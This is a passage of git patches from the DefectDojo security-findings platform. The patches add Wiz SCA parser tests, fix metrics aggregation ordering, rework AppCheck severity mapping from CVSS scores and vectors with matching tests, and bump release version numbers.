+++ b/unittests/tools/test_wiz_parser.py @@ -40,5 +40,63 @@ def test_multiple_findings(self): self.assertEqual("Unusual activity by a principal from previously unseen country", finding.title) self.assertEqual("High", finding.severity) finding = findings[20] - self.assertEqual("User/service account with get/list/watch permissions on secrets in an AKS cluster", finding.title) + self.assertEqual( + "User/service account with get/list/watch permissions on secrets in an AKS cluster", finding.title, + ) self.assertEqual("Informational", finding.severity) + + def test_sca_format(self): + with open("unittests/scans/wiz/sca_format.csv", encoding="utf-8") as testfile: + parser = WizParser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(5, len(findings)) + + finding = findings[0] + self.assertEqual("github.com/containerd/containerd: CVE-2024-39474", finding.title) + self.assertEqual("Low", finding.severity) + self.assertEqual("github.com/containerd/containerd", finding.component_name) + self.assertEqual("1.4.0", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2024-39474", finding.unsaved_vulnerability_ids) + self.assertIn("**Location Path**: `/home/kubernetes/bin/containerd-gcfs-grpc`", finding.description) + self.assertIn("**Location Path**: `/home/kubernetes/bin/containerd-gcfs-grpc`", finding.mitigation) + + finding = findings[1] + self.assertEqual("k8s.io/apimachinery: CVE-2024-36891", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("k8s.io/apimachinery", finding.component_name) + self.assertEqual("0.17.2", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2024-36891", finding.unsaved_vulnerability_ids) + self.assertIn("**Location Path**: `/home/kubernetes/bin/log-counter`", finding.description) + self.assertIn("**Location Path**: `/home/kubernetes/bin/log-counter`", finding.mitigation) + + finding = findings[2] + self.assertEqual("kernel: GHSA-c9cp-9c75-9v8c", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("kernel", finding.component_name) + self.assertEqual("109.17800.218.33", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("GHSA-c9cp-9c75-9v8c", finding.unsaved_vulnerability_ids) + self.assertNotIn("**Location Path**:", finding.description) + self.assertNotIn("**Location Path**:", finding.mitigation) + + finding = findings[3] + self.assertEqual("kernel: CVE-2020-8559", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("kernel", finding.component_name) + self.assertEqual("109.17800.218.33", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2020-8559", finding.unsaved_vulnerability_ids) + self.assertNotIn("**Location Path**:", finding.description) + self.assertNotIn("**Location Path**:", finding.mitigation) + + finding = findings[4] + self.assertEqual("kernel: CVE-2024-36891", finding.title) + self.assertEqual("Medium", finding.severity) + self.assertEqual("kernel", finding.component_name) + self.assertEqual("109.17800.218.33", finding.component_version) + self.assertIn("goog-k8s-cluster-location: us-central1", finding.unsaved_tags) + self.assertIn("CVE-2024-36891", finding.unsaved_vulnerability_ids) + self.assertNotIn("**Location Path**:", finding.description) + self.assertNotIn("**Location Path**:", finding.mitigation) From 2b1fd3d467ec6158cc5bf7c61418e230b2dc9bfd Mon Sep 17 00:00:00 2001 From: dogboat Date: Mon, 16 Sep 2024 13:08:55 -0400 Subject: [PATCH 09/12] Fix metrics aggregation (#10917) * metrics-aggregate-fix add an order_by() to aggregate_counts_by_period() so aggregation works properly * metrics-aggregate-fix replace single quotes with double quotes * retrigger github actions --- dojo/metrics/utils.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dojo/metrics/utils.py b/dojo/metrics/utils.py index 263b7065f2c..8ca345b41f7 100644 --- a/dojo/metrics/utils.py +++ b/dojo/metrics/utils.py @@ -500,7 +500,7 @@ def aggregate_counts_by_period( ) desired_values += ("closed",) - return severities_by_period.values(*desired_values) + return severities_by_period.order_by("grouped_date").values(*desired_values) def findings_by_product( From 86aeeffbd5747f672f72422b54f384bcd6e34a18 Mon Sep 17 00:00:00 2001 From: dogboat Date: Mon, 16 Sep 2024 13:52:06 -0400 Subject: [PATCH 10/12] appcheck-severity-determination-fix Use v4, v3, v2 cvss vectors for severity (#10918) * appcheck-severity-determination-fix Use v4, v3, v2 cvss vectors for determining severity in that order; update some type hints * appcheck-severity-determination-fix process cvss-base_score-related variables for severity determination first, then fall back to vectors, then default to "Info" * appcheck-severity-determination-fix fix typo --- .../engines/appcheck.py | 2 +- .../engines/base.py | 93 +++++++++++++++---- ...heck_web_application_scanner_many_vul.json | 2 +- ...appcheck_web_application_scanner_parser.py | 35 ++++++- 4 files changed, 107 insertions(+), 25 deletions(-) diff --git a/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py b/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py index ffcfa4b5632..ba29a780bc7 100644 --- a/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py +++ b/dojo/tools/appcheck_web_application_scanner/engines/appcheck.py @@ -27,7 +27,7 @@ def extract_request_response(self, finding: Finding, value: dict[str, [str]]) -> value.pop("Messages") finding.unsaved_request, finding.unsaved_response = (d.strip() for d in rr_details[0]) - def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, [str]]]]) -> None: + def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, list[str]]]]) -> None: self.extract_request_response(finding, value) # super's version adds everything else to the description field return super().parse_details(finding, value) diff --git a/dojo/tools/appcheck_web_application_scanner/engines/base.py b/dojo/tools/appcheck_web_application_scanner/engines/base.py index 2b2f1cc1890..f45fd506698 100644 --- a/dojo/tools/appcheck_web_application_scanner/engines/base.py +++ b/dojo/tools/appcheck_web_application_scanner/engines/base.py @@ -5,6 +5,7 @@ import cvss.parser import dateutil.parser from cpe import CPE +from cvss.exceptions import CVSSError from django.core.exceptions import ImproperlyConfigured from dojo.models import Endpoint, Finding @@ -41,6 +42,35 @@ def escape_if_needed(x): return "".join([escape_if_needed(c) for c in s]) +def cvss_score_to_severity(score: float, version: int) -> str: + """ + Maps a CVSS score with a given version to a severity level. + Mapping from https://nvd.nist.gov/vuln-metrics/cvss (modified slightly to have "Info" in range [0.0, 0.1) for CVSS + v3/v4) + """ + cvss_score = float(score) + if version == 2: + if cvss_score >= 7.0: + severity = "High" + elif cvss_score >= 4.0: + severity = "Medium" + else: + severity = "Low" + else: + if cvss_score >= 9.0: + severity = "Critical" + elif cvss_score >= 7.0: + severity = "High" + elif cvss_score >= 4.0: + severity = "Medium" + elif cvss_score >= 0.1: + severity = "Low" + else: + severity = "Info" + + return severity + + ####### # Field parsing helper classes ####### @@ -122,7 +152,6 @@ class BaseEngineParser: * status -> active/false_p/risk_accepted (depending on value) * cves -> unsaved_vulnerability_ids (vulnerability_ids) * cpe -> component name/version - * cvss_vector -> severity (determined using CVSS package) * notes -> appended to Finding description * details -> appended to Finding description @@ -143,7 +172,6 @@ class BaseEngineParser: "status": Method("parse_status"), "cves": Method("parse_cves"), "cpe": Method("parse_components"), - "cvss_vector": Method("parse_severity"), # These should be listed after the 'description' entry; they append to it "notes": Method("parse_notes"), "details": Method("parse_details")} @@ -176,7 +204,7 @@ def parse_initial_date(self, finding: Finding, value: str) -> None: def is_cve(self, c: str) -> bool: return bool(c and isinstance(c, str) and self.CVE_PATTERN.fullmatch(c)) - def parse_cves(self, finding: Finding, value: [str]) -> None: + def parse_cves(self, finding: Finding, value: list[str]) -> None: finding.unsaved_vulnerability_ids = [c.upper() for c in value if self.is_cve(c)] ##### @@ -192,19 +220,6 @@ def parse_status(self, finding: Finding, value: str) -> None: elif value == "acceptable_risk": finding.risk_accepted = True - ##### - # For severity (extracted from cvss vector) - ##### - def get_severity(self, value: str) -> Optional[str]: - if cvss_obj := cvss.parser.parse_cvss_from_text(value): - if (severity := cvss_obj[0].severities()[0].title()) in Finding.SEVERITIES: - return severity - return None - - def parse_severity(self, finding: Finding, value: str) -> None: - if severity := self.get_severity(value): - finding.severity = severity - ##### # For parsing component data ##### @@ -217,7 +232,7 @@ def parse_cpe(self, cpe_str: str) -> (Optional[str], Optional[str]): (cpe_obj.get_version() and cpe_obj.get_version()[0]) or None, ) - def parse_components(self, finding: Finding, value: [str]) -> None: + def parse_components(self, finding: Finding, value: list[str]) -> None: # Only use the first entry finding.component_name, finding.component_version = self.parse_cpe(value[0]) @@ -236,12 +251,12 @@ def append_description(self, finding: Finding, addendum: dict[str, str]) -> None def parse_notes(self, finding: Finding, value: str) -> None: self.append_description(finding, {"Notes": value}) - def extract_details(self, value: Union[str, dict[str, Union[str, dict[str, [str]]]]]) -> dict[str, str]: + def extract_details(self, value: Union[str, dict[str, Union[str, dict[str, list[str]]]]]) -> dict[str, str]: if isinstance(value, dict): return {k: v for k, v in value.items() if k != "_meta"} return {"Details": str(value)} - def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, [str]]]]) -> None: + def parse_details(self, finding: Finding, value: dict[str, Union[str, dict[str, list[str]]]]) -> None: self.append_description(finding, self.extract_details(value)) ##### @@ -282,6 +297,44 @@ def set_endpoints(self, finding: Finding, item: Any) -> None: endpoints = self.parse_endpoints(item) finding.unsaved_endpoints.extend(endpoints) + ##### + # For severity (extracted from various cvss vectors) + ##### + def parse_cvss_vector(self, value: str) -> Optional[str]: + # CVSS4 vectors don't parse with the handy-danty parse method :( + try: + if (severity := cvss.CVSS4(value).severity) in Finding.SEVERITIES: + return severity + except CVSSError: + pass + + if cvss_obj := cvss.parser.parse_cvss_from_text(value): + if (severity := cvss_obj[0].severities()[0].title()) in Finding.SEVERITIES: + return severity + return None + + def set_severity(self, finding: Finding, item: Any) -> None: + for base_score_entry, cvss_version in [ + ("cvss_v4_base_score", 4), + ("cvss_v3_base_score", 3), + ("cvss_base_score", 2), + ]: + if base_score := item.get(base_score_entry): + finding.severity = cvss_score_to_severity(base_score, cvss_version) + return + + for vector_type in ["cvss_v4_vector", "cvss_v3_vector", "cvss_vector"]: + if vector := item.get(vector_type): + if severity := self.parse_cvss_vector(vector): + finding.severity = severity + return + + finding.severity = "Info" + + def process_whole_item(self, finding: Finding, item: Any) -> None: + self.set_severity(finding, item) + self.set_endpoints(finding, item) + # Returns the complete field processing map: common fields plus any engine-specific def get_engine_fields(self) -> dict[str, FieldType]: return { @@ -302,7 +355,7 @@ def parse_finding(self, item: dict[str, Any]) -> Tuple[Finding, Tuple]: # Check first whether the field even exists on this item entry; if not, skip it if value := item.get(field): field_handler(self, finding, value) - self.set_endpoints(finding, item) + self.process_whole_item(finding, item) # Make a note of what scanning engine was used for this Finding self.append_description(finding, {"Scanning Engine": self.SCANNING_ENGINE}) return finding, self.get_finding_key(finding) diff --git a/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json b/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json index ee12493a840..052de390779 100644 --- a/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json +++ b/unittests/scans/appcheck_web_application_scanner/appcheck_web_application_scanner_many_vul.json @@ -514,7 +514,7 @@ "cvss_score": 0.0, "type": "WEB_APP", "web_app": "https://example.x73zjffz.com", - "cvss_v4_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N", + "cvss_v4_vector": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "mss_confirmed": false, "category": "web_app", "description": "[[markup]]This is simply a report of HTTP request methods supported by the web application.", diff --git a/unittests/tools/test_appcheck_web_application_scanner_parser.py b/unittests/tools/test_appcheck_web_application_scanner_parser.py index 8928f89abd6..ebe2186a24f 100644 --- a/unittests/tools/test_appcheck_web_application_scanner_parser.py +++ b/unittests/tools/test_appcheck_web_application_scanner_parser.py @@ -4,6 +4,7 @@ from dojo.tools.appcheck_web_application_scanner.engines.appcheck import AppCheckScanningEngineParser from dojo.tools.appcheck_web_application_scanner.engines.base import ( BaseEngineParser, + cvss_score_to_severity, escape_non_printable, strip_markup, ) @@ -96,7 +97,7 @@ def test_appcheck_web_application_scanner_parser_with_many_vuln_has_many_finding self.assertEqual("a25dae3aff97a06b6923b5fc9cc32826e1fd87ab", finding.unique_id_from_tool) self.assertEqual("Apache Tomcat < v9.0.0.M10 - External Control of Assumed-Immutable Web Parameter in JSP Servlet (CVE-2016-6796)", finding.title) self.assertEqual("2024-06-26", finding.date) - self.assertEqual("Medium", finding.severity) + self.assertEqual("High", finding.severity) self.assertEqual(True, finding.active) self.assertEqual("GET Request", finding.unsaved_request) self.assertEqual("Response", finding.unsaved_response) @@ -121,7 +122,7 @@ def test_appcheck_web_application_scanner_parser_with_many_vuln_has_many_finding self.assertEqual("02769aa244c456f0aad810354748faaa70d089c1129dc9c5", finding.unique_id_from_tool) self.assertEqual("Permitted HTTP Methods", finding.title) self.assertEqual("2024-06-27", finding.date) - self.assertEqual("Low", finding.severity) + self.assertEqual("Medium", finding.severity) self.assertEqual(True, finding.active) self.assertIsNone(finding.unsaved_request) self.assertIsNone(finding.unsaved_response) @@ -334,8 +335,15 @@ def test_appcheck_web_application_scanner_parser_base_engine_parser(self): # Invalid cvss vectors ("", None), ("AV:N/AC:H", None), + ("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "High"), + ("CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:U/C:N/I:N/A:N", None), + ("CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:L/SI:H/SA:H", "Critical"), + ("CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N", "Medium"), + ("CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:N/SA:H", "High"), + ("CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:N/SA:H", "Low"), + ("CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:N/SI:N/SA:N", None), ]: - self.assertEqual(severity, engine.get_severity(cvss_vector)) + self.assertEqual(severity, engine.parse_cvss_vector(cvss_vector)) # Test component parsing f = Finding() @@ -560,3 +568,24 @@ def test_appcheck_web_application_scanner_parser_non_printable_escape(self): ), ]: self.assertEqual(expected, escape_non_printable(test_string)) + + def test_appcheck_web_application_scanner_parser_cvss_score_mapping(self): + for cvss_score, version, expected in [ + # CVSSv2 + (0.0, 2, "Low"), (0.09, 2, "Low"), (0.1, 2, "Low"), (3.9, 2, "Low"), + (4.0, 2, "Medium"), (5.5, 2, "Medium"), (6.9, 2, "Medium"), + (7.0, 2, "High"), (8.3, 2, "High"), (10.0, 2, "High"), + # CVSSv3 + (0.0, 3, "Info"), (0.09, 3, "Info"), + (0.1, 3, "Low"), (1.2, 3, "Low"), (3.9, 3, "Low"), + (4.0, 3, "Medium"), (5.4, 3, "Medium"), (6.9, 3, "Medium"), + (7.0, 3, "High"), (8.3, 3, "High"), (8.9, 3, "High"), + (9.0, 3, "Critical"), (9.7, 3, "Critical"), (10.0, 3, "Critical"), + # CVSSv4 + (0.0, 4, "Info"), (0.09, 4, "Info"), + (0.1, 4, "Low"), (1.2, 4, "Low"), (3.9, 4, "Low"), + (4.0, 4, "Medium"), (5.4, 4, "Medium"), (6.9, 4, "Medium"), + (7.0, 4, "High"), (8.3, 4, "High"), (8.9, 4, "High"), + (9.0, 4, "Critical"), (9.7, 4, "Critical"), (10.0, 4, "Critical"), + ]: + self.assertEqual(expected, cvss_score_to_severity(cvss_score, version)) From 46fcef2b8efdf2dfbe088c6566378288daa4d04c Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 16 Sep 2024 18:29:53 +0000 Subject: [PATCH 11/12] Update versions in application files --- components/package.json | 2 +- dojo/__init__.py | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/components/package.json b/components/package.json index 49f5862eecd..c750020d3ae 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.39.0-dev", + "version": "2.38.2", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/dojo/__init__.py b/dojo/__init__.py index 729d5f3ea8b..bac40506f9a 100644 --- a/dojo/__init__.py +++ b/dojo/__init__.py @@ -4,6 +4,6 @@ # Django starts so that shared_task will use this app. from .celery import app as celery_app # noqa: F401 -__version__ = "2.38.1" +__version__ = "2.38.2" __url__ = "https://github.com/DefectDojo/django-DefectDojo" __docs__ = "https://documentation.defectdojo.com" diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 61744bdfbd6..8fcc60818ca 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.39.0-dev" +appVersion: "2.38.2" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.150-dev +version: 1.6.150 icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From 5abef72d9783332b60d8cb5ec05ba25f1e174300 Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 16 Sep 2024 19:14:35 +0000 Subject: [PATCH 12/12] Update versions in application files --- components/package.json | 2 +- dojo/__init__.py | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/components/package.json b/components/package.json index c750020d3ae..49f5862eecd 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.38.2", + "version": "2.39.0-dev", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/dojo/__init__.py b/dojo/__init__.py index bac40506f9a..82fc1241506 100644 --- a/dojo/__init__.py +++ b/dojo/__init__.py @@ -4,6 +4,6 @@ # Django starts so that shared_task will use this app. from .celery import app as celery_app # noqa: F401 -__version__ = "2.38.2" +__version__ = "2.39.0-dev" __url__ = "https://github.com/DefectDojo/django-DefectDojo" __docs__ = "https://documentation.defectdojo.com" diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 8fcc60818ca..9bd09f45faf 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.38.2" +appVersion: "2.39.0-dev" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.150 +version: 1.6.151-dev icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap